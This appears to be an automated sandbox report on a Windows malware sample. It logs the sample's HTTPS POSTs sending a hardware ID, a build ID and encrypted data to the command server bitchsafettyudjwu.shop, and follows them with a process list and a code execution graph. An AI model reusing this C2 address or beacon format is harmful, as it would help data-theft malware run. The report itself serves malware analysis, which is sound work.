          2024-07-04 19:49:04 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB7B81ACC4339D6F892C20FE69E6BE89--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
          2024-07-04 19:49:04 UTC15331OUTData Raw: 0a 40 c2 8b f7 e1 73 8b 80 37 e0 75 95 af 30 15 58 c9 cd 58 02 48 7c 1a 1a 44 79 12 fa 1a b0 4d e4 c0 ef 82 6b 7d 47 71 48 46 6f 2d b8 c6 18 ba 28 4e c3 ef 25 3b 09 81 73 aa 58 18 b7 85 5d b3 44 87 c8 ef 5c 3d b8 e5 ba 13 a4 04 da ff bf 55 4a 9a 37 d0 ee 77 06 77 d1 a0 9e 4c ee 09 04 9e db 38 98 8f 26 e7 98 1a 1a 56 6c c2 ee 49 2d e1 83 b8 7f 2e 18 a4 9c 60 70 17 f4 ad db cc 21 c6 11 89 5e 41 70 25 21 d5 ce 15 07 1a 64 b9 fe 86 e8 e8 9d e9 76 c5 90 8c 12 4c dd c9 2b 54 a7 f9 6e d6 25 85 3e fa 62 c0 14 ee 94 f0 b4 df 82 a2 46 0c e3 5e 2f 4e 29 71 a7 35 62 a9 e5 c6 d2 6a 43 b0 54 4f 21 62 03 b8 3f 0a 8b 30 f9 97 30 2c 4a f2 76 83 9f 93 2c a7 c6 9e b8 45 5a 91 ad e4 9d 30 1c 5f b5 11 a3 92 19 69 58 58 6c 59 7d e6 fd 12 f0 dd 47 d3 44 07 f0 83 1f fd 68 f6 e6
          Data Ascii: @s7u0XXH|DyMk}GqHFo-(N%;sX]D\=UJ7wwL8&VlI-.`p!^Ap%!dvL+Tn%>bF^/N)q5bjCTO!b?00,Jv,EZ0_iXXlY}GDh
          2024-07-04 19:49:04 UTC15331OUTData Raw: 2a 12 5e 2c 8c a8 57 d1 89 28 aa 58 70 ee b2 22 92 c6 3e 89 b0 32 71 78 3d 9d de fe 6b 0d 9a 43 58 de c8 2f 81 7d 50 ef 14 db c4 e0 88 4d b9 b1 bc 89 f0 16 8a 58 90 a7 18 ed cc 43 5c c7 4b 04 15 29 32 f4 f6 4b 44 14 1b af 65 3c 1e 36 16 a1 55 c4 a5 9d 57 ac 4d 82 08 d0 d6 d9 7e a7 df 84 37 99 fc 05 22 b4 14 6f e2 d5 72 1f 68 cc 76 28 04 19 db 3d a9 08 7c 10 eb 37 76 48 e6 8b 0e 2c be a1 10 ad 85 ee 19 0c 13 98 fd 62 30 3d d8 b1 4e 2f 36 3b d8 79 91 29 8e 0e e3 e7 1e a8 a7 ff a5 ec fc 3d 96 c2 d0 2b e5 cc cd 19 f8 ae be 3d 61 ce 19 90 44 f8 9d 8f d0 ad 75 13 88 70 a3 1d a1 5a df 1f 22 ef c9 45 87 a0 58 31 b3 e5 f4 16 0f 8d be 9e 9f fa 2e 72 b5 e2 af c0 9f 2d 6a 9b 71 5e 4e 90 b7 3a 9c 71 8a 8c b9 8b b9 f7 70 f1 4a 74 66 ae ca dd 38 36 a9 f5 30 f9 12 a3 61
          Data Ascii: *^,W(Xp">2qx=kCX/}PMXC\K)2KDe<6UWM~7"orhv(=|7vH,b0=N/6;y)=+=aDupZ"EX1.r-jq^N:qpJtf860a
          2024-07-04 19:49:04 UTC15331OUTData Raw: 57 f7 16 4d 54 1d 1a 29 6e d0 3e 39 88 10 77 f7 0e 50 7d a1 cb e9 f7 96 21 45 5f fd f6 a4 c4 76 e9 ab 3d f5 e2 d2 b3 ab 61 c0 36 06 35 c7 36 6b cd 2b 01 18 ea ef bb 1f 8f bc 62 ba f4 05 67 a0 0e b4 cc 37 ef 7b b4 4e b8 1a ae 94 9a e2 6d 1d 8c f2 df 5d 9b fa 8b a0 9b 22 28 fe 22 76 c0 17 9c b1 f9 af 68 72 f4 7a 47 9d 51 ce d2 44 b3 d5 f6 52 d1 47 27 5e 72 b4 fc ee 92 9a 4f 5c b3 9d f3 e1 d7 0b ef fd f7 32 64 87 05 ef 50 dc 3e a0 7b 91 9f 1f 72 a4 1f 10 fe ab a5 a4 6e 6e 72 2e 52 5d 43 97 ec 3e de e8 8d 5a 12 b9 89 f6 b8 e7 9a 24 94 d4 a0 27 68 e6 02 c6 da d4 98 4a dd de 82 e0 da 12 ec 3c 4a dd 3c 2e 43 27 0c 6e f9 dd 39 f9 b9 1b c7 ec 69 3f 5a 92 b6 f0 88 b2 b7 bb fd e3 5c 6a e5 0f 8e 41 9c 05 45 f6 6a f3 5d 9e e2 c5 73 34 bf b2 d6 7e f2 a7 dd 33 3c fd 96
          Data Ascii: WMT)n>9wP}!E_v=a656k+bg7{Nm]"("vhrzGQDRG'^rO\2dP>{rnnr.R]C>Z$'hJ<J<.C'n9i?Z\jAEj]s4~3<
          2024-07-04 19:49:04 UTC15331OUTData Raw: 2d 65 86 f4 43 e2 f4 62 26 6f c2 a6 fa fe 5c 1c dc 3c a8 23 dc e5 ab 75 9a e3 23 65 34 de e6 e0 55 4e ce 59 f0 1a 1a 79 a1 ba 54 9b 5c 55 96 84 8e 3d a0 3a 62 c1 b1 09 de ef ec 22 2f b6 7b 67 4f 2b d3 ed 21 b7 59 b3 32 ef c9 df 63 25 19 f0 aa c0 cd ea 0c d7 5c 88 b7 8c e8 45 18 cc 71 c1 1f 66 0c 6e ee 45 08 01 a3 89 5c a8 8e 08 f4 5e 9f e1 23 0e 8e ab d9 ec 40 9e 87 d2 1b a2 fe 57 26 6d 91 41 01 b7 bd 26 9d 8a ee 23 c1 87 7b 99 4d 3c 60 88 e2 38 6a ad ea 82 11 de 79 f7 fe d3 e1 f7 da a6 fe 5a 92 0e f7 8f 48 da dc 53 79 af 6c 4e 4a f7 43 ff 7d 40 6b 5a 38 99 b0 02 31 fc 13 a9 7c ff ff 57 72 43 12 94 8e f1 c0 79 60 f1 cf c0 25 99 c5 37 42 8c aa 72 4a 4a 0b b2 18 fe bc 58 f2 a8 88 87 83 70 9e 6a ff c4 d9 11 4e f8 2e 51 96 95 20 88 f8 b3 3d 1d a8 68 3f 43 12
          Data Ascii: -eCb&o\<#u#e4UNYyT\U=:b"/{gO+!Y2c%\EqfnE\^#@W&mA&#{M<`8jyZHSylNJC}@kZ81|WrCy`%7BrJJXpjN.Q =h?C
          2024-07-04 19:49:04 UTC15331OUTData Raw: 05 e8 de 1e 5e d3 5e b2 bd 95 58 21 dc 20 48 69 72 e3 7b 39 71 b6 73 72 69 6d c8 c6 ad 62 7e 9d 59 84 9c 53 9d 84 70 53 39 b2 c2 a2 f1 f3 72 0d b6 5a be d0 c5 9e 50 20 f7 2c aa 90 d4 68 60 e0 2b f0 e3 60 4b 20 55 5d b9 d5 5b bb 36 01 8a f7 de f6 79 96 a6 85 0c 2c d8 7e b5 a3 56 c4 5a 86 11 80 d8 55 eb 8c 52 0e d7 e7 d8 76 71 4c e9 17 c2 80 a0 1b 63 f7 f8 7a ee 1f b9 bb 35 e9 54 af d8 5d e4 ec d1 96 2c 54 a2 12 6d 28 66 3f de 77 f9 a3 91 cd 37 7d cf 02 41 43 8d a6 b0 2d be b0 d3 6d 7c c5 f9 86 b3 8e b1 bd 15 db 0f 7e 04 19 fe 10 3a e7 2c fb ab 2e f1 19 f4 bb 04 9b 5b 99 88 21 80 07 43 05 f4 d6 b6 41 79 5b ee 0f 57 48 38 1b d1 3b 88 5b bf 45 2f 38 aa 73 78 4b 1f 77 88 e3 8f 9a d8 3a 4a 2f 32 33 20 19 56 49 32 a2 f7 a9 a9 cf ea c9 63 42 60 9f 1f d5 21 fd 53
          Data Ascii: ^^X! Hir{9qsrimb~YSpS9rZP ,h`+`K U][6y,~VZURvqLcz5T],Tm(f?w7}AC-m|~:,.[!CAy[WH8;[E/8sxKw:J/23 VI2cB`!S
          2024-07-04 19:49:04 UTC15331OUTData Raw: 3f d6 4c 70 39 17 c8 10 b1 98 8d 44 1e c2 c8 f2 36 cb da 85 4c af ff 2c a7 c8 89 92 77 75 3d 67 95 fc 7f 6d 15 3f 71 b2 08 f8 7a e7 70 5e 5c 95 c7 9b 7d 6d 81 71 ba 7d df 90 78 77 ee 5b 55 d6 b0 44 13 ec c2 a9 12 64 a4 20 c8 43 07 56 97 66 24 a5 71 82 90 1b a8 73 9b 29 48 dd cd 86 4d 94 3b dc aa 7a 28 fa e3 22 20 ac 7a 07 81 5b 38 99 d9 cc 09 0e 54 c9 ff b6 ec 95 8d 8f 5e 32 e0 da 9d e5 21 59 2f 53 ff fa d7 c7 8f 90 3f 76 c6 67 03 09 e2 bd 37 70 8b 38 64 f9 2d c7 34 f7 b9 92 f8 6a bc a2 15 2d 89 b1 fe 33 13 1f f9 64 33 34 05 91 7c 9b 85 d9 1c b7 25 0d 25 14 68 23 e1 e6 03 56 a4 09 3a 2b 77 56 4b bf cd 47 b3 7e 46 89 de 44 03 dc e6 ea cf 34 96 cf 10 82 7e 6d 74 e9 71 ce bd 40 26 3b c0 b9 fa c7 b5 28 87 5e b0 58 23 04 ae 6e 8c 96 7c ac 91 1e ad 54 ea db ac
          Data Ascii: ?Lp9D6L,wu=gm?qzp^\}mq}xw[UDd CVf$qs)HM;z(" z[8T^2!Y/S?vg7p8d-4j-3d34|%%h#V:+wVKG~FD4~mtq@&;(^X#n|T
          2024-07-04 19:49:04 UTC15331OUTData Raw: a4 d4 c3 4a fc c0 da 88 59 77 07 49 d0 7d 87 fa 93 48 08 91 43 cc 3b 51 0f 04 cc c1 eb 86 f3 d7 42 61 c2 f3 10 7d fe c4 c5 a1 0a 87 d1 bc 74 82 88 26 43 21 5d f1 35 39 c1 d3 14 36 ad 87 cb a4 ba a8 dc 77 d3 36 17 c3 30 30 81 ec cc f7 ab fd bf ed 69 2d 7a 99 3f 12 36 01 cf 81 b9 e7 28 58 76 fe cc f8 0b 2c cc 87 e3 5d 94 c6 76 8e 4f cc b9 b2 ed 07 22 0d 88 da 28 33 b1 be a2 1b f6 b5 2e 4a e9 73 e3 29 66 17 14 2f 29 65 18 cc a9 b7 b9 c6 da d7 10 e5 43 f5 2e 09 c6 93 f9 01 af c0 7a 6c d5 51 d7 fa 4e b3 a6 f1 fd 21 8e 52 01 48 cc 2a 5f 51 2f fd 81 a7 3f 09 7b 7d df a2 37 94 8c ec 4e 8d 6b a9 e1 3d 11 0d 34 9b 4f 83 df ca 57 f5 4b 3c 39 2f ca 1e 1c 1f 96 e8 77 da 74 fe 17 f1 84 52 b8 7f aa fe aa 00 29 d0 23 86 31 6c 94 df 53 12 70 cd 6b 69 f3 4b 22 9e 54 6b 2a
          Data Ascii: JYwI}HC;QBa}t&C!]596w600i-z?6(Xv,]vO"(3.Js)f/)eC.zlQN!RH*_Q/?{}7Nk=4OWK<9/wtR)#1lSpkiK"Tk*
          2024-07-04 19:49:04 UTC15331OUTData Raw: 25 4c f7 f5 93 be 3d 51 85 9a 17 89 fb 7b 00 7d 30 13 a1 25 41 cc 7c 59 50 75 79 3f 80 ff e5 05 d1 06 93 ee 95 39 6b 2f 13 5b c8 da 58 ae 03 ea bb 26 8f c0 76 33 87 19 29 70 75 b7 a9 3c 44 8a 87 83 90 65 c2 19 96 ee a3 c9 f0 6b 32 2f c6 2e 48 62 89 53 7c 1d bf 12 fc 16 84 5b 09 88 48 37 3f 8f f9 07 2a dc b9 3d 15 ea 9d 0e 1d 4b 90 65 36 ae d3 44 f0 bb 64 e1 77 00 e5 36 94 14 bb 75 f0 79 08 11 7f 83 71 31 d9 76 b6 bb 68 58 8f 2d 23 2c e4 c6 3d 78 6d b4 40 38 4a a5 13 70 27 e6 c2 8f 12 60 2d c3 5f 73 4c ce 2b 9d b6 86 68 09 51 21 48 79 23 50 87 2a 4c 10 a1 13 f6 5d aa 7f 00 f1 43 7c fc 82 12 df 6a 0e 3c 8a 95 7f fa 09 1c e8 fd da 94 8f 32 6b 08 96 e0 bc 01 e9 4f 82 55 11 b4 60 d7 98 c6 17 4f 06 d5 1d f2 db 03 f8 66 93 f2 c8 fc 7c b3 5b f4 a8 30 41 61 a6 f6
          Data Ascii: %L=Q{}0%A|YPuy?9k/[X&v3)pu<Dek2/.HbS|[H7?*=Ke6Ddw6uyq1vhX-#,=xm@8Jp'`-_sL+hQ!Hy#P*L]C|j<2kOU`Of|[0Aa
          2024-07-04 19:49:04 UTC15331OUTData Raw: 58 5b 5a b9 4e 6b bc 9c f9 fb c9 b9 d0 f6 7d 01 9c a3 66 2b 5e 88 0d c0 3e da 22 dd ff 1f a0 cc 3e d7 7a 54 68 0c d2 cd 19 1b 7a fb 9f 6e 1f 87 8d ef 82 ba 05 d9 fc 73 d5 f7 0f df 92 20 6c 37 0a e0 f6 42 64 7e 28 63 4f f4 50 6c be 91 1d 0a 86 c3 6c 77 6f b3 f4 e7 ac 5b 3f 83 eb 43 78 b9 53 58 76 41 f6 d1 fd d2 cc 5b 0d 6a 36 a7 91 b5 8d 71 df 5f fa e6 78 29 80 3d 78 4e 40 64 d5 62 8c d4 49 27 5f ee 87 66 57 07 59 5a d1 84 05 3f 59 9c f3 f8 ab f9 6d 80 9f 40 fc 35 42 0c c2 05 e3 b6 7e 3d bb 34 9a 24 42 f1 85 cc 1d f3 33 10 32 0f eb 45 77 08 36 65 69 1d 02 87 ad d3 6b 6b 8c 56 03 d3 9a d0 a6 a5 18 7e 7a 23 0f c5 dc a4 98 7b 9e 65 ad 27 7d ba 9e c6 0b 26 37 d0 33 76 a0 e9 97 b0 c6 02 e5 75 52 ad 6c ba 62 7d a0 ac c8 98 ce 1b e5 c4 70 6f 29 66 b3 ca bc b7 2b
          Data Ascii: X[ZNk}f+^>">zThzns l7Bd~(cOPllwo[?CxSXvA[j6q_x)=xN@dbI'_fWYZ?Ym@5B~=4$B32Ew6eikkV~z#{e'}&73vuRlb}po)f+
          2024-07-04 19:49:07 UTC814INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:49:06 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=ef6j6uqen2vedd41m3pcvep1nd; expires=Mon, 28-Oct-2024 13:35:45 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBVzCHAA8fKxzL6D%2BP4sdSpBSFF%2FEzW6%2BnfsRP3rq22hOc%2B6cCdie0NZJNAGGI%2BaCavkl1gKNKm6sZ7%2Fsc2XXpRUr9GwcpynAMQx3yuyL7q49ldYEIYT7xzuVjzsEjlWMvA1vOMl0%2Fm%2B"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2ee28e15e79-EWR
          alt-svc: h3=":443"; ma=86400


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          8192.168.2.449749104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:49:07 UTC270OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 86
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:49:07 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59 41 4c 55 56 26 6a 3d 26 68 77 69 64 3d 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39
          Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--@SEFYALUV&j=&hwid=AB7B81ACC4339D6F892C20FE69E6BE89
          2024-07-04 19:49:07 UTC800INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:49:07 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=kj980elu1tbttookagjpbm4urm; expires=Mon, 28-Oct-2024 13:35:46 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2Z6qz4jfoAiE7Bhpn20ribXkN9CUoeusohNPau5%2BjLrbvP2R6Mvc4FYxLiqWBhAvgA5ezD4btVHGSGUdM7e6tR4UgKbhs0SuxC0p8qCXTYWdsfFUnh4gTGofxR9O2Vkyqr2pZliiyF5"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a30299fbc459-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:49:07 UTC54INData Raw: 33 30 0d 0a 37 72 79 52 43 49 39 51 66 39 43 50 2b 39 7a 37 4a 36 2b 66 6e 43 79 32 45 37 65 5a 66 7a 49 6a 4b 34 42 41 49 6f 2f 38 73 6c 2b 31 34 51 3d 3d 0d 0a
          Data Ascii: 307ryRCI9Qf9CP+9z7J6+fnCy2E7eZfzIjK4BAIo/8sl+14Q==
          2024-07-04 19:49:07 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:15:48:53
          Start date:04/07/2024
          Path:C:\Users\user\Desktop\qeUaxJCA3FO.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\qeUaxJCA3FO.exe"
          Imagebase:0xf90000
          File size:530'432 bytes
          MD5 hash:EFC76B9581DA08661C9C91C2A6E7D289
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:15:48:54
          Start date:04/07/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0x180000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:15:48:54
          Start date:04/07/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0xf60000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:15:48:54
          Start date:04/07/2024
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 304
          Imagebase:0xe0000
          File size:483'680 bytes
          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:2.8%
            Dynamic/Decrypted Code Coverage:0.4%
            Signature Coverage:3.2%
            Total number of Nodes:2000
            Total number of Limit Nodes:19
            execution_graph 24632 fa96ee 24633 fa9709 24632->24633 24634 fa96f9 24632->24634 24638 fa970f 24634->24638 24637 fa899f ___free_lconv_mon 14 API calls 24637->24633 24639 fa972a 24638->24639 24640 fa9724 24638->24640 24642 fa899f ___free_lconv_mon 14 API calls 24639->24642 24641 fa899f ___free_lconv_mon 14 API calls 24640->24641 24641->24639 24643 fa9736 24642->24643 24644 fa899f ___free_lconv_mon 14 API calls 24643->24644 24645 fa9741 24644->24645 24646 fa899f ___free_lconv_mon 14 API calls 24645->24646 24647 fa974c 24646->24647 24648 fa899f ___free_lconv_mon 14 API calls 24647->24648 24649 fa9757 24648->24649 24650 fa899f ___free_lconv_mon 14 API calls 24649->24650 24651 fa9762 24650->24651 24652 fa899f ___free_lconv_mon 14 API calls 24651->24652 24653 fa976d 24652->24653 24654 fa899f ___free_lconv_mon 14 API calls 24653->24654 24655 fa9778 24654->24655 24656 fa899f ___free_lconv_mon 14 API calls 24655->24656 24657 fa9783 24656->24657 24658 fa899f ___free_lconv_mon 14 API calls 24657->24658 24659 fa9791 24658->24659 24664 fa953b 24659->24664 24665 fa9547 ___scrt_is_nonwritable_in_current_image 24664->24665 24680 fa2f71 EnterCriticalSection 24665->24680 24669 fa9551 24670 fa899f ___free_lconv_mon 14 API calls 24669->24670 24671 fa957b 24669->24671 24670->24671 24681 fa959a 24671->24681 24672 fa95a6 24673 fa95b2 ___scrt_is_nonwritable_in_current_image 24672->24673 24685 fa2f71 EnterCriticalSection 24673->24685 24675 fa95bc 24676 fa97dc __Getctype 14 API calls 24675->24676 24677 fa95cf 24676->24677 24686 fa95ef 24677->24686 24680->24669 24684 fa2fb9 LeaveCriticalSection 24681->24684 24683 fa9588 24683->24672 24684->24683 24685->24675 24689 fa2fb9 LeaveCriticalSection 24686->24689 24688 fa95dd 24688->24637 24689->24688 22093 f910c6 22094 f910cf 22093->22094 22101 f97cfe 22094->22101 22096 f910de 22107 f981b8 22096->22107 22102 f97d0a __EH_prolog3 22101->22102 22103 f9afd6 codecvt 3 API calls 22102->22103 22104 f97d3f 22103->22104 22105 f97d50 codecvt 22104->22105 22114 f98f97 22104->22114 22105->22096 22108 f981d7 22107->22108 22109 f910f2 22108->22109 22152 f9f612 22108->22152 22111 f9b273 22109->22111 22159 f9b246 22111->22159 22115 f98fa3 __EH_prolog3 22114->22115 22116 f97865 std::_Lockit::_Lockit 7 API calls 22115->22116 22117 f98fae 22116->22117 22125 f98fdf 22117->22125 22126 f990fa 22117->22126 22119 f978bd std::_Lockit::~_Lockit 2 API calls 22121 f9901c codecvt 22119->22121 22120 f98fc1 22132 f9911d 22120->22132 22121->22105 22124 f98eef _Yarn 14 API calls 22124->22125 22125->22119 22127 f9afd6 codecvt 3 API calls 22126->22127 22128 f99105 22127->22128 22129 f99119 22128->22129 22136 f98e2b 22128->22136 22129->22120 22133 f99129 22132->22133 22134 f98fc9 22132->22134 22139 f9aa8c 22133->22139 22134->22124 22137 f98eef _Yarn 14 API calls 22136->22137 22138 f98e65 22137->22138 22138->22120 22140 f9aa9c EncodePointer 22139->22140 22141 fa2fe7 22139->22141 22140->22134 22140->22141 22142 fab830 _unexpected 2 API calls 22141->22142 22143 fa2fec 22142->22143 22144 fa2ff7 22143->22144 22145 fab875 _unexpected 43 API calls 22143->22145 22146 fa3001 IsProcessorFeaturePresent 22144->22146 22151 fa3020 22144->22151 22145->22144 22148 fa300d 22146->22148 22147 fa6a9f _unexpected 23 API calls 22150 fa302a 22147->22150 22149 fa2c23 _unexpected 8 API calls 22148->22149 22149->22151 22151->22147 22153 f9f61e 22152->22153 22154 f9f633 22152->22154 22155 fa2f1d __strnicoll 14 API calls 22153->22155 22154->22109 22156 f9f623 22155->22156 22157 fa2e1f __strnicoll 43 API calls 22156->22157 22158 f9f62e 22157->22158 22158->22109 22160 f9b25c 22159->22160 22161 f9b255 22159->22161 22168 fa865c 22160->22168 22165 fa85df 22161->22165 22164 f910fc 22166 fa865c 46 API calls 22165->22166 22167 fa85f1 22166->22167 22167->22164 22171 fa83a8 22168->22171 22172 fa83b4 ___scrt_is_nonwritable_in_current_image 22171->22172 22179 fa2f71 EnterCriticalSection 22172->22179 22174 fa83c2 22180 fa8403 22174->22180 22176 fa83cf 22190 fa83f7 22176->22190 22179->22174 22181 fa8491 std::_Locinfo::_Locinfo_ctor 22180->22181 22182 fa841e 22180->22182 22181->22176 22182->22181 22184 fb2dd9 46 API calls 22182->22184 22189 fa8471 22182->22189 22183 fb2dd9 46 API calls 22185 fa8487 22183->22185 22186 fa8467 22184->22186 22187 fa899f ___free_lconv_mon 14 API calls 22185->22187 22188 fa899f ___free_lconv_mon 14 API calls 22186->22188 22187->22181 22188->22189 22189->22181 22189->22183 22193 fa2fb9 LeaveCriticalSection 22190->22193 22192 fa83e0 22192->22164 22193->22192 23102 fa945d 23103 fa9469 ___scrt_is_nonwritable_in_current_image 23102->23103 23114 fa2f71 EnterCriticalSection 23103->23114 23105 fa9470 23115 fb0928 23105->23115 23108 fa948e 23139 fa94b4 23108->23139 23114->23105 23116 fb0934 ___scrt_is_nonwritable_in_current_image 23115->23116 23117 fb095e 23116->23117 23118 fb093d 23116->23118 23142 fa2f71 EnterCriticalSection 23117->23142 23119 fa2f1d __strnicoll 14 API calls 23118->23119 23121 fb0942 23119->23121 23122 fa2e1f __strnicoll 43 API calls 23121->23122 23125 fa947f 23122->23125 23123 fb0996 23150 fb09bd 23123->23150 23125->23108 23128 fa92f7 GetStartupInfoW 23125->23128 23127 fb096a 23127->23123 23143 fb0878 23127->23143 23129 fa93a8 23128->23129 23130 fa9314 23128->23130 23134 fa93ad 23129->23134 23130->23129 23131 fb0928 44 API calls 23130->23131 23132 fa933c 23131->23132 23132->23129 23133 fa936c GetFileType 23132->23133 23133->23132 23135 fa93b4 23134->23135 23136 fa93f7 GetStdHandle 23135->23136 23137 fa9459 23135->23137 23138 fa940a GetFileType 23135->23138 23136->23135 23137->23108 23138->23135 23154 fa2fb9 LeaveCriticalSection 23139->23154 23141 fa949f 23142->23127 23144 fa8942 __Getctype 14 API calls 23143->23144 23145 fb088a 23144->23145 23147 fa8fc7 6 API calls 23145->23147 23149 fb0897 23145->23149 23146 fa899f ___free_lconv_mon 14 API calls 23148 fb08ec 23146->23148 23147->23145 23148->23127 23149->23146 23153 fa2fb9 LeaveCriticalSection 23150->23153 23152 fb09c4 23152->23125 23153->23152 23154->23141 20662 f9ae37 20663 f9ae43 ___scrt_is_nonwritable_in_current_image 20662->20663 20688 f9b0ad 20663->20688 20665 f9ae4a 20666 f9afa3 20665->20666 20675 f9ae74 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 20665->20675 20725 f9b69a IsProcessorFeaturePresent 20666->20725 20668 f9afaa 20729 fa6adb 20668->20729 20671 fa6a9f _unexpected 23 API calls 20672 f9afb8 20671->20672 20673 f9ae93 20674 f9af14 20696 fa6719 20674->20696 20675->20673 20675->20674 20707 fa6ab5 20675->20707 20678 f9af1a 20700 fb9d30 GetThreadId 20678->20700 20680 f9af31 20714 f9b7b4 GetModuleHandleW 20680->20714 20683 f9af48 20719 f9b21e 20683->20719 20684 f9af3f 20684->20683 20716 fa6a90 20684->20716 20689 f9b0b6 20688->20689 20732 f9b380 IsProcessorFeaturePresent 20689->20732 20693 f9b0c7 20694 f9b0cb 20693->20694 20742 f9e11d 20693->20742 20694->20665 20697 fa6727 20696->20697 20698 fa6722 20696->20698 20697->20678 20802 fa6473 20698->20802 20701 f9afd6 codecvt 3 API calls 20700->20701 20702 fb9d71 20701->20702 21038 fb9c80 20702->21038 20704 fb9d7b 20706 fb9d90 messages 20704->20706 21072 f91210 20704->21072 20706->20680 20708 fa215b ___scrt_is_nonwritable_in_current_image 20707->20708 20709 fa6acb std::_Locinfo::_Locinfo_ctor 20707->20709 20710 fa9827 __Getctype 43 API calls 20708->20710 20709->20674 20713 fa216c 20710->20713 20711 fa2fe7 __purecall 43 API calls 20712 fa2196 20711->20712 20713->20711 20715 f9af3b 20714->20715 20715->20668 20715->20684 21599 fa68c3 20716->21599 20720 f9b22a 20719->20720 20721 f9af51 20720->20721 21674 fa879c 20720->21674 20721->20673 20723 f9b238 20724 f9e11d ___scrt_uninitialize_crt 7 API calls 20723->20724 20724->20721 20726 f9b6b0 _unexpected codecvt 20725->20726 20727 f9b75b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20726->20727 20728 f9b79f _unexpected 20727->20728 20728->20668 20730 fa68c3 _unexpected 23 API calls 20729->20730 20731 f9afb0 20730->20731 20731->20671 20733 f9b0c2 20732->20733 20734 f9e0fe 20733->20734 20748 f9f1d7 20734->20748 20738 f9e11a 20738->20693 20739 f9e10f 